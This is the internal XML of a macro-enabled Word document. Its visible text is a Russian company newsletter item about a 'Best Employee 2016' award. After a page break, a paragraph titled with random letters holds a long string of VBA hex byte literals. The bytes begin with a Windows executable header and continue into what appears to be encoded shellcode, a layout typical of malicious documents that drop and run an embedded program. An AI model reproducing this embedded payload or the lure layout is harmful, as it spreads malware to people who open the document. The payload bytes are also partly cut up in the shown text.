
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="bin" ContentType="application/vnd.ms-office.vbaPro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CC7" w:rsidRPr="00477CC7" w:rsidRDefault="00477CC7" w:rsidP="00477CC7">
      <w:pPr>
        <w:spacing w:after="120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</w:pPr>
      <w:r w:rsidRPr="00477CC7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>Лучший сотрудник</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00477CC7" w:rsidRPr="00477CC7" w:rsidRDefault="006759BB" w:rsidP="00477CC7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629025" cy="2695575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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7CC7" w:rsidRPr="00477CC7" w:rsidRDefault="00477CC7" w:rsidP="00477CC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77CC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>В нашей компании Департамент по управлению персоналом не только принимает сотрудников на работу, но и обучает их, дает возможности для развития, а также поощряет достижения. Подводя итоги 2016 года, руководство компании решило провести конкурс «Лучший сотрудник 2016». В нем мог принять участие любой член нашей команды, номинированный коллегами. Необходимо было указать событие, важное для нашей компании, и то, как проявил себя в нем данный сотрудник. А затем жюри в составе совета директоров подводило итоги. И в результате нашими победителями стали 2 сотрудника российского офиса: из финансового департамента и из департамента продаж.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00477CC7" w:rsidRPr="00477CC7" w:rsidRDefault="00477CC7" w:rsidP="00477CC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77CC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Антон,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сотрудник одного из подразделений ССГПО</w:t>
      </w:r>
      <w:r w:rsidRPr="00477CC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, поделился с коллегами своей радостью: «Спасибо всем за участие в этом голосовании, отдельный «респект» тем, кто отдал свой голос за мою кандидатуру. Надеюсь в этом году и в последующем держать эту высокую планку, которую вы мне поставили».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00477CC7" w:rsidRPr="00477CC7" w:rsidRDefault="00477CC7" w:rsidP="00477CC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77CC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Наши победители получили возможность выбора между обучающей программой или походом в ресторан с семьей и/или коллегами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00477CC7" w:rsidRPr="00477CC7" w:rsidRDefault="00477CC7" w:rsidP="00477CC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77CC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Но номинантов было так много, что мы выбрали и лауреатов конкурса. Ими стали сотрудники юридического, технического, департамента по управлению сетями поставок, а также департамента продаж. Эти сотрудники также были вознаграждены по достоинству.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00477CC7" w:rsidRPr="00477CC7" w:rsidRDefault="00477CC7" w:rsidP="00477CC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77CC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Много голосов было также отдано и за других наших сотрудников. Поздравляем всех участников и желаем дальнейшего профессионального роста!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00477CC7" w:rsidRPr="00477CC7" w:rsidRDefault="00477CC7" w:rsidP="00477CC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477CC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Уверенность в правильном выборе</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00477CC7" w:rsidRDefault="00477CC7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00477CC7" w:rsidRDefault="00477CC7" w:rsidP="00477CC7">
      <w:r>
        <w:t>Ovabsczqtn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00477CC7" w:rsidRDefault="00477CC7" w:rsidP="00477CC7">
      <w:r>
        <w:t>&amp;H4D&amp;H5A&amp;H90&amp;H00&amp;H03&amp;H00&amp;H00&amp;H00&amp;H04&amp;H00&amp;H00&amp;H00&amp;HFF&amp;HFF&amp;H00&amp;H00&amp;HB8&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40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80&amp;H00&amp;H00&amp;H00&amp;H0E&amp;H1F&amp;HBA&amp;H0E&amp;H00&amp;HB4&amp;H09&amp;HCD&amp;H21&amp;HB8&amp;H01&amp;H4C&amp;HCD&amp;H21&amp;H54&amp;H68&amp;H69&amp;H73&amp;H20&amp;H70&amp;H72&amp;H6F&amp;H67&amp;H72&amp;H61&amp;H6D&amp;H20&amp;H63&amp;H61&amp;H6E&amp;H6E&amp;H6F&amp;H74&amp;H20&amp;H62&amp;H65&amp;H20&amp;H72&amp;H75&amp;H6E&amp;H20&amp;H69&amp;H6E&amp;H20&amp;H44&amp;H4F&amp;H53&amp;H20&amp;H6D&amp;H6F&amp;H64&amp;H65&amp;H2E&amp;H0D&amp;H0D&amp;H0A&amp;H24&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H50&amp;H45&amp;H00&amp;H00&amp;H4C&amp;H01&amp;H03&amp;H00&amp;H19&amp;HDA&amp;H9E&amp;HC1&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HE0&amp;H00&amp;H0F&amp;H03&amp;H0B&amp;H01&amp;H02&amp;H38&amp;H00&amp;H02&amp;H00&amp;H00&amp;H00&amp;H0E&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H20&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H02&amp;H00&amp;H00&amp;H04&amp;H00&amp;H00&amp;H00&amp;H01&amp;H00&amp;H00&amp;H00&amp;H04&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H00&amp;H00&amp;H00&amp;H02&amp;H00&amp;H00&amp;H46&amp;H3A&amp;H00&amp;H00&amp;H02&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H20&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H30&amp;H00&amp;H00&amp;H64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2E&amp;H74&amp;H65&amp;H78&amp;H74&amp;H00&amp;H00&amp;H00&amp;H28&amp;H00&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H02&amp;H00&amp;H00&amp;H00&amp;H02&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H20&amp;H00&amp;H30&amp;H60&amp;H2E&amp;H64&amp;H61&amp;H74&amp;H61&amp;H00&amp;H00&amp;H00&amp;H90&amp;H0A&amp;H00&amp;H00&amp;H00&amp;H20&amp;H00&amp;H00&amp;H00&amp;H0C&amp;H00&amp;H00&amp;H00&amp;H04&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H20&amp;H00&amp;H30&amp;HE0&amp;H2E&amp;H69&amp;H64&amp;H61&amp;H74&amp;H61&amp;H00&amp;H00&amp;H64&amp;H00&amp;H00&amp;H00&amp;H00&amp;H30&amp;H00&amp;H00&amp;H00&amp;H02&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H00&amp;H30&amp;HC0&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HB8&amp;H00&amp;H20&amp;H40&amp;H00&amp;HFF&amp;HE0&amp;H90&amp;HFF&amp;H25&amp;H38&amp;H30&amp;H40&amp;H00&amp;H90&amp;H90&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HFF&amp;HFF&amp;HFF&amp;HFF&amp;H00&amp;H00&amp;H00&amp;H00&amp;HFF&amp;HFF&amp;HFF&amp;HFF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</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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BA&amp;H06&amp;H9C&amp;HAF&amp;H17&amp;HDB&amp;HD1&amp;HD9&amp;H74&amp;H24&amp;HF4&amp;H5D&amp;H29&amp;HC9&amp;H66&amp;HB9&amp;H04&amp;H02&amp;H31&amp;H55&amp;H15&amp;H83&amp;HED&amp;HFC&amp;H03&amp;H55&amp;H17&amp;H7E&amp;H5A&amp;H26&amp;HD7&amp;H16&amp;HAD&amp;H59&amp;H97&amp;HE6&amp;HC9&amp;HA6&amp;H27&amp;H83&amp;H98&amp;H79&amp;H9C&amp;H8E&amp;H21&amp;HEE&amp;H52&amp;HAE&amp;HD1&amp;HC8&amp;HE6&amp;HF4&amp;H29&amp;HB5&amp;H35&amp;H3C&amp;H60&amp;HDB&amp;H08&amp;HE9&amp;H94&amp;HDF&amp;H3D&amp;H02&amp;H18&amp;H8F&amp;HB5&amp;H71&amp;H6C&amp;HD1&amp;H3D&amp;HBB&amp;H89&amp;HC4&amp;H14&amp;H5A&amp;H92&amp;H77&amp;H8F&amp;H6A&amp;H03&amp;H1F&amp;H74&amp;HD4&amp;H50&amp;HE9&amp;HDB&amp;H8E&amp;HF8&amp;H9D&amp;H72&amp;H88&amp;H50&amp;H94&amp;H43&amp;HEC&amp;H98&amp;H79&amp;H67&amp;H1E&amp;H3E&amp;H69&amp;H71&amp;H57&amp;H69&amp;H98&amp;H2A&amp;H18&amp;HC4&amp;H80&amp;H7C&amp;HC9&amp;H5F&amp;HC8&amp;HAF&amp;H7D&amp;H81&amp;HE5&amp;H52&amp;HB9&amp;HCA&amp;H28&amp;HCA&amp;HE5&amp;H05&amp;HE0&amp;H2E&amp;HA3&amp;HC5&amp;HED&amp;HA1&amp;HF6&amp;H72&amp;HC5&amp;H8E&amp;H19&amp;HCD&amp;H63&amp;H65&amp;H7E&amp;HA4&amp;H7E&amp;H09&amp;H7F&amp;H92&amp;H58&amp;HF5&amp;H98&amp;H4E&amp;H50&amp;HCA&amp;H0E&amp;H0D&amp;HB2&amp;H20&amp;HAC&amp;H72&amp;H14&amp;H7E&amp;H80&amp;HBF&amp;HBA&amp;H65&amp;HD6&amp;H04&amp;HF0&amp;H85&amp;H72&amp;H55&amp;HDB&amp;HB9&amp;HFD&amp;HC9&amp;H97&amp;H9C&amp;H0B&amp;HCB&amp;H40&amp;H36&amp;HB6&amp;H08&amp;H6B&amp;H5E&amp;H7F&amp;H3C&amp;HF8&amp;H4A&amp;H74&amp;HE3&amp;H72&amp;H5E&amp;H7B&amp;H7B&amp;H72&amp;H1A&amp;HFA&amp;HAA&amp;H38&amp;H9F&amp;H7B&amp;HA7&amp;H52&amp;H36&amp;HF4&amp;H49&amp;H6B&amp;HD9&amp;H03&amp;H29&amp;H59&amp;H41&amp;HBC&amp;H52&amp;HEF&amp;H0C&amp;HCA&amp;H41&amp;H60&amp;H89&amp;HEF&amp;H52&amp;H08&amp;H69&amp;HE6&amp;H10&amp;HC0&amp;H28&amp;H53&amp;HC1&amp;H43&amp;H5B&amp;H45&amp;HF1&amp;HCA&amp;H24&amp;H6B&amp;H35&amp;HE8&amp;H67&amp;HC2&amp;H17&amp;H14&amp;HD5&amp;HBA&amp;HB9&amp;H98&amp;H05&amp;H27&amp;H00&amp;H51&amp;HAB&amp;HEF&amp;HE9&amp;HDA&amp;H0B&amp;HED&amp;HA5&amp;H72&amp;HF5&amp;H55&amp;H6F&amp;HEC&amp;H20&amp;HCC&amp;HEC&amp;H71&amp;H1B&amp;H4A&amp;HD0&amp;H03&amp;HAC&amp;HEB&amp;HC3&amp;H9B&amp;H0F&amp;H08&amp;HA7&amp;H20&amp;HA0&amp;H55&amp;H18&amp;H22&amp;H5E&amp;H07&amp;H26&amp;H96&amp;H6D&amp;H96&amp;H77&amp;H4F&amp;H2F&amp;H88&amp;HB6&amp;H14&amp;H7C&amp;H12&amp;H18&amp;HCE&amp;HAD&amp;H27&amp;H79&amp;HE4&amp;H7E&amp;H68&amp;HF7&amp;H48&amp;H6F&amp;H0A&amp;H5A&amp;H6C&amp;H6A&amp;H80&amp;H28&amp;H54&amp;H53&amp;HF8&amp;HB5&amp;H52&amp;HCE&amp;H42&amp;H62&amp;H7F&amp;HCA&amp;H19&amp;H71&amp;H0A&amp;HDF&amp;H5B&amp;HDF&amp;H84&amp;HC7&amp;HE9&amp;H45&amp;H06&amp;H47&amp;HDA&amp;H67&amp;HA0&amp;H5A&amp;HB6&amp;HEB&amp;H4E&amp;H63&amp;HA4&amp;H81&amp;H75&amp;HFE&amp;H8F&amp;H0B&amp;H8F&amp;H67&amp;H5B&amp;H8F&amp;H3C&amp;HF6&amp;HE6&amp;H15&amp;HEB&amp;H45&amp;H45&amp;H09&amp;H91&amp;H70&amp;H32&amp;HC6&amp;H7E&amp;H0F&amp;H95&amp;H5C&amp;H0F&amp;HEE&amp;H93&amp;H8C&amp;H17&amp;H2C&amp;H0E&amp;H86&amp;H44&amp;H11&amp;H1A&amp;HB8&amp;H4F&amp;HB7&amp;H01&amp;H6D&amp;HFD&amp;H07&amp;H28&amp;H18&amp;HB2&amp;H34&amp;H2A&amp;HE7&amp;HFE&amp;H4C&amp;H18&amp;H0E&amp;HE0&amp;HEE&amp;H72&amp;H9A&amp;H5C&amp;HAA&amp;HFC&amp;H3C&amp;HEC&amp;H01&amp;H40&amp;H00&amp;H72&amp;HF2&amp;HA1&amp;HFE&amp;HF9&amp;H95&amp;HB9&amp;H1E&amp;HB5&amp;H07&amp;H51&amp;H18&amp;HF5&amp;H41&amp;HE9&amp;HA2&amp;H04&amp;H10&amp;H41&amp;H96&amp;H34&amp;H7D&amp;HB3&amp;H8D&amp;H7C&amp;H19&amp;HC5&amp;H45&amp;HC6&amp;H5C&amp;H65&amp;H7F&amp;HAC&amp;H17&amp;HA5&amp;H0C&amp;H41&amp;H5C&amp;H17&amp;HDE&amp;H96&amp;H83&amp;H98&amp;HB2&amp;HF1&amp;H09&amp;HF9&amp;H7E&amp;H9C&amp;HA0&amp;H0A&amp;H5B&amp;H49&amp;HB0&amp;HB3&amp;HEE&amp;H51&amp;H28&amp;H10&amp;H43&amp;HB0&amp;HE1&amp;H03&amp;H99&amp;H63&amp;HE0&amp;H25&amp;H6E&amp;H51&amp;H28&amp;H50&amp;H36&amp;HAD&amp;H81&amp;H99&amp;HE5&amp;H51&amp;H7B&amp;H7A&amp;H3D&amp;H06&amp;H94&amp;H32&amp;HC8&amp;H97&amp;H83&amp;HD2&amp;H4B&amp;HC3&amp;HD6&amp;H70&amp;H56&amp;H3F&amp;HEF&amp;H4D&amp;HA8&amp;H47&amp;HAC&amp;H6A&amp;H93&amp;HB2&amp;H90&amp;H4C&amp;H66&amp;HE7&amp;H1F&amp;H26&amp;HA4&amp;HAE&amp;H2F&amp;H4C&amp;H89&amp;H38&amp;H55&amp;HC5&amp;HE0&amp;HC9&amp;HC9&amp;H96&amp;HED&amp;HC2&amp;HD5&amp;H48&amp;H5C&amp;HB4&amp;HE8&amp;H21&amp;H00&amp;H4B&amp;HFF&amp;H3D&amp;HB1&amp;H45&amp;H68&amp;H58&amp;H7E&amp;HC9&amp;HA5&amp;H16&amp;H9D&amp;H85&amp;HEC&amp;HC6&amp;H76&amp;H58&amp;H89&amp;HD1&amp;H6F&amp;HC0&amp;HE5&amp;HA6&amp;H34&amp;HB8&amp;HED&amp;H30&amp;HD3&amp;H73&amp;HD2&amp;H53&amp;H03&amp;H4B&amp;H64&amp;H73&amp;HED&amp;H52&amp;HF8&amp;HB8&amp;HF7&amp;H67&amp;HE3&amp;HC8&amp;HFB&amp;H0D&amp;HFE&amp;HF2&amp;HDE&amp;HD2&amp;H51&amp;H85&amp;H1F&amp;H47&amp;HE2&amp;HC5&amp;H03&amp;H4C&amp;H89&amp;HED&amp;HF0&amp;H72&amp;H8C&amp;H1E&amp;HD0&amp;HCA&amp;HD4&amp;H8D&amp;H03&amp;H15&amp;HE1&amp;H1D&amp;HFF&amp;H2F&amp;HB0&amp;H60&amp;H08&amp;HEE&amp;H58&amp;H89&amp;H1E&amp;H0D&amp;HF9&amp;H2D&amp;H8F&amp;HC1&amp;H00&amp;H1C&amp;H40&amp;HFB&amp;HD9&amp;H7F&amp;H31</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&amp;HC7&amp;H16&amp;H4A&amp;H9B&amp;HA6&amp;H7F&amp;H74&amp;H95&amp;HC8&amp;H9A&amp;H0A&amp;H3D&amp;H23&amp;HC9&amp;H05&amp;H98&amp;H48&amp;H94&amp;H06&amp;H25&amp;H25&amp;H35&amp;HCC&amp;HEB&amp;H60&amp;HE3&amp;HE2&amp;H4D&amp;H23&amp;H66&amp;HB6&amp;H12&amp;H2E&amp;H08&amp;H31&amp;H43&amp;H94&amp;H54&amp;H7E&amp;H7A&amp;H47&amp;H53&amp;H92&amp;H94&amp;H36&amp;H42&amp;H33&amp;HB9&amp;H3C&amp;H36&amp;H15&amp;H47&amp;HB9&amp;H7F&amp;H49&amp;H0A&amp;HB6&amp;H45&amp;H8B&amp;H3A&amp;HBD&amp;H09&amp;HF3&amp;HA6&amp;H29&amp;H60&amp;HC8&amp;H1C&amp;H6B&amp;H9B&amp;HCB&amp;H68&amp;HE0&amp;HA2&amp;HD2&amp;HF2&amp;H6E&amp;H25&amp;H00&amp;HC7&amp;HA7&amp;H69&amp;H27&amp;H3B&amp;HA0&amp;H75&amp;HFF&amp;H44&amp;H89&amp;H92&amp;HBA&amp;H8A&amp;H1D&amp;H97&amp;H7B&amp;HDE&amp;H58&amp;H0A&amp;HFD&amp;HBB&amp;HD4&amp;H9A&amp;H78&amp;H20&amp;H28&amp;HD6&amp;H28&amp;H64&amp;HCC&amp;HD9&amp;H92&amp;H89&amp;HE9&amp;H94&amp;H86&amp;HFF&amp;H1F&amp;H9E&amp;HDB&amp;H13&amp;H6F&amp;HC3&amp;H60&amp;HD1&amp;H53&amp;H32&amp;H1F&amp;H6F&amp;H3F&amp;H93&amp;HA9&amp;H0B&amp;H8C&amp;H58&amp;HBF&amp;H0B&amp;H42&amp;H7C&amp;HD6&amp;H84&amp;HBE&amp;H20&amp;H52&amp;HE2&amp;HF5&amp;H00&amp;H15&amp;H67&amp;H8C&amp;H57&amp;HD8&amp;H11&amp;H4B&amp;HFB&amp;H45&amp;H83&amp;HA9&amp;H83&amp;HDB&amp;HEC&amp;HFC&amp;H78&amp;H81&amp;HF1&amp;H82&amp;HE8&amp;HEA&amp;H8B&amp;H86&amp;HCA&amp;H43&amp;HCD&amp;H46&amp;HBB&amp;H1E&amp;H5E&amp;HDE&amp;HEC&amp;H17&amp;H6A&amp;HD2&amp;H76&amp;H6E&amp;H7B&amp;H5B&amp;HF8&amp;HA2&amp;H8B&amp;H8A&amp;H84&amp;H80&amp;H12&amp;H0D&amp;H95&amp;H7B&amp;HE4&amp;H85&amp;H09&amp;H9D&amp;HF8&amp;H2F&amp;H1C&amp;HAF&amp;H55&amp;HAC&amp;H42&amp;H0F&amp;H95&amp;H21&amp;HE2&amp;H21&amp;H56&amp;HF7&amp;HE6&amp;H6B&amp;H26&amp;HF8&amp;H9A&amp;H57&amp;HF7&amp;H8B&amp;HA6&amp;H70&amp;H84&amp;HE3&amp;H5C&amp;H70&amp;HAE&amp;H0A&amp;HE6&amp;H8C&amp;H6E&amp;HF4&amp;H4C&amp;HDA&amp;HB2&amp;H1E&amp;H54&amp;HD2&amp;H3B&amp;HB2&amp;HE0&amp;H81&amp;H9B&amp;H20&amp;H37&amp;H62&amp;HB2&amp;H2E&amp;H38&amp;HA5&amp;H26&amp;H72&amp;H5E&amp;H0C&amp;H69&amp;H64&amp;H7A&amp;H78&amp;HB3&amp;H5F&amp;H6F&amp;HA6&amp;H0E&amp;H7B&amp;H49&amp;H6F&amp;H54&amp;H73&amp;H9A&amp;H9A&amp;H59&amp;H2E&amp;H67&amp;H85&amp;H44&amp;H36&amp;HC9&amp;H22&amp;H7A&amp;H00&amp;H17&amp;HBB&amp;H63&amp;H10&amp;HDE&amp;H24&amp;HA5&amp;HB9&amp;H9A&amp;H0E&amp;HF7&amp;H74&amp;HDD&amp;H17&amp;H50&amp;H87&amp;HCE&amp;H3D&amp;H5C&amp;H17&amp;H7A&amp;H6F&amp;H73&amp;HC2&amp;H36&amp;H0E&amp;H3B&amp;HAD&amp;H3A&amp;HD8&amp;HF1&amp;H13&amp;H03&amp;H54&amp;HDB&amp;HD8&amp;H26&amp;H62&amp;H59&amp;HF8&amp;HFC&amp;H62&amp;H10&amp;HB5&amp;HF9&amp;H0F&amp;H1D&amp;H3A&amp;HD8&amp;H25&amp;H06&amp;HCA&amp;H6E&amp;HEF&amp;HC4&amp;HE3&amp;HFE&amp;HA5&amp;HC8&amp;H6E&amp;H19&amp;H18&amp;HCA&amp;H0C&amp;HFF&amp;HA6&amp;HCB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00477CC7" w:rsidRDefault="00477CC7" w:rsidP="00477CC7">
      <w:r>
        <w:t>&amp;HFF&amp;HF2&amp;HF6&amp;H60&amp;HB6&amp;HEB&amp;H4B&amp;H26&amp;H88&amp;H59&amp;HD7&amp;H03&amp;H31&amp;HC4&amp;H3E&amp;H20&amp;H96&amp;H18&amp;H25&amp;H77&amp;H2E&amp;H3C&amp;H2B&amp;H14&amp;H90&amp;HDF&amp;HAF&amp;H86&amp;H46&amp;H73&amp;H29&amp;H1C&amp;H4A&amp;H2C&amp;H19&amp;H45&amp;H61&amp;HD9&amp;H84&amp;HD9&amp;HEC&amp;H91&amp;HA8&amp;HB0&amp;HC0&amp;H0A&amp;H12&amp;HD5&amp;HAB&amp;H68&amp;H8B&amp;HFE&amp;H19&amp;H2F&amp;H13&amp;HD6&amp;HFC&amp;HF8&amp;H74&amp;H61&amp;H12&amp;HDF&amp;H28&amp;HE6&amp;HDE&amp;HD3&amp;HAD&amp;HE7&amp;HF6&amp;H3D&amp;H95&amp;H3D&amp;H2E&amp;H66&amp;HDB&amp;HEE&amp;H0D&amp;H80&amp;H69&amp;H98&amp;H5E&amp;HCA&amp;H7C&amp;HDB&amp;HA6&amp;H07&amp;HB2&amp;HCA&amp;HF2&amp;HA2&amp;H2B&amp;H96&amp;H89&amp;H5F&amp;H78&amp;HA6&amp;HAB&amp;HBF&amp;H17&amp;H82&amp;H57&amp;H98&amp;HD5&amp;H4A&amp;H6C&amp;HF6&amp;HCE&amp;HCC&amp;H04&amp;H8B&amp;H7E&amp;H6B&amp;H71&amp;H86&amp;H4E&amp;HA4&amp;HD2&amp;H5B&amp;H95&amp;H2E&amp;H64&amp;H5F&amp;H9B&amp;HDF&amp;H74&amp;HEB&amp;H51&amp;HE5&amp;HA5&amp;HF7&amp;HA0&amp;H41&amp;H7A&amp;HA1&amp;HF6&amp;H22&amp;H90&amp;H15&amp;H21&amp;H4E&amp;H12&amp;HB8&amp;HC1&amp;HA3&amp;HF2&amp;H12&amp;HB7&amp;H64&amp;H95&amp;HE4&amp;H3F&amp;H68&amp;H3D&amp;H06&amp;H9A&amp;H27&amp;H26&amp;HF3&amp;H85&amp;HE9&amp;H0A&amp;H76&amp;HD8&amp;H27&amp;H9F&amp;HD9&amp;H4C&amp;H7A&amp;HA7&amp;H85&amp;H00&amp;HFD&amp;HBB&amp;HC7&amp;H68&amp;HB1&amp;H86&amp;HBA&amp;HDB&amp;H4E&amp;H78&amp;H86&amp;H73&amp;HD8&amp;HBF&amp;H6B&amp;H88&amp;H78&amp;HEF&amp;H2D&amp;H85&amp;H6E&amp;HF4&amp;H5F&amp;H3E&amp;HD4&amp;HA8&amp;H8D&amp;HDF&amp;H47&amp;HF1&amp;HDC&amp;HEA&amp;H25&amp;H5A&amp;H25&amp;H05&amp;HFF&amp;H00&amp;H3C&amp;H6A&amp;HCB&amp;H5E&amp;H29&amp;H73&amp;H54&amp;HB3&amp;H4D&amp;H36&amp;H23&amp;HC2&amp;H7B&amp;H85&amp;H4C&amp;HD5&amp;HF8&amp;H21&amp;H03&amp;H85&amp;H5A&amp;HF3&amp;HC0&amp;H88&amp;H6C&amp;HBD&amp;HBC&amp;H19&amp;HEA&amp;H99&amp;H0E&amp;H99&amp;HCF&amp;HA2&amp;H07&amp;H4E&amp;H9F&amp;H01&amp;H8F&amp;HAF&amp;H6E&amp;H95&amp;H42&amp;HA7&amp;HEA&amp;HD8&amp;HDA&amp;H57&amp;H90&amp;HE7&amp;H4A&amp;HC4&amp;HCF&amp;H9F&amp;HEC&amp;HBF&amp;H58&amp;HFE&amp;H51&amp;HB2&amp;H2A&amp;HB2&amp;H40&amp;H78&amp;H26&amp;H51&amp;HB0&amp;H4F&amp;H48&amp;H64&amp;H71&amp;H6C&amp;H1F&amp;H24&amp;H20&amp;H09&amp;H8D&amp;HAF&amp;H46&amp;H0F&amp;H72&amp;H46&amp;HDB&amp;H51&amp;HFE&amp;H4F&amp;H96&amp;H43&amp;HC2&amp;H9E&amp;HA8&amp;HDF&amp;H10&amp;HA4&amp;H10&amp;H2C&amp;HE9&amp;H1E&amp;H31&amp;HE3&amp;H95&amp;HA1&amp;H8D&amp;H2B&amp;H81&amp;HD1&amp;H9A&amp;H25&amp;HC0&amp;HA8&amp;H5A&amp;H05&amp;HF7&amp;HED&amp;H5E&amp;H87&amp;HDB&amp;H11&amp;H82&amp;HEA&amp;HD1&amp;HB4&amp;HF0&amp;H3F&amp;H5F&amp;H3F&amp;HF8&amp;H31&amp;H91&amp;HAF&amp;H84&amp;H81&amp;H71&amp;HCB&amp;H89&amp;HCF&amp;HD1&amp;H8D&amp;H7C&amp;HF4&amp;H9A&amp;H2E&amp;HA2&amp;H6C&amp;H10&amp;HAD&amp;HA1&amp;HF7&amp;HEA&amp;HBA&amp;HB9&amp;H24&amp;H99&amp;H98&amp;HD4&amp;H73&amp;HEC&amp;H7E&amp;H2F&amp;H52&amp;H08&amp;HB1&amp;H6F&amp;H7E&amp;H3D&amp;H93&amp;H0D&amp;HC3&amp;H1A&amp;H42&amp;HBA&amp;H71&amp;H52&amp;HAD&amp;HD9&amp;H97&amp;H69&amp;H47&amp;H5B&amp;H45&amp;H65&amp;HB1&amp;H39&amp;H09&amp;H2C&amp;HE8&amp;HAF&amp;H9F&amp;H5A&amp;H67&amp;HBC&amp;H28&amp;HE6&amp;H3F&amp;HA6&amp;HE9&amp;H44&amp;H22&amp;H18&amp;H9B&amp;H8A&amp;H88&amp;HD5&amp;HE1&amp;H1D&amp;H68&amp;H4F&amp;H01&amp;H0D&amp;H90&amp;HA3&amp;H26&amp;HBD&amp;H2C&amp;HE4&amp;H4C&amp;HBA&amp;H4F&amp;H07&amp;H94&amp;H4C&amp;H1A&amp;H1B&amp;H98&amp;H0B&amp;H1F&amp;HFD&amp;HF1&amp;HC6&amp;H40&amp;H32&amp;H55&amp;H87&amp;H85&amp;H49&amp;H7F&amp;H28&amp;H9D&amp;HE0&amp;H77&amp;H3B&amp;H37&amp;HAE&amp;H8A&amp;HDB&amp;H56&amp;H28&amp;H77&amp;H9B&amp;HC9&amp;H7C&amp;H10&amp;HA6&amp;HCF&amp;H6F&amp;HFE&amp;HE4&amp;HE7&amp;H64&amp;H69</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
